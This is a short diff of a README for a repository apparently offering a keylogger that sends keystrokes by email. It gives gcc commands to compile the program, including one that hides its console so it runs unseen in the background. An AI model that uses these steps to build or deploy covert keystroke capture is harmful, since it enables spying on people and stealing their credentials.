christoperisiderio/SMTProtocol-Keystrokes-Listener-V1/README.md

 # bash
 > gcc -o keylogger main.c -luser32

-If you want to run it in background without showing the console use this instead:
+NOTE: If you want to run it in background without showing the console use this instead:

 >  gcc -o main.exe main.c -luser32 -lgdi32 -lws2_32 -lwinmm -mwindows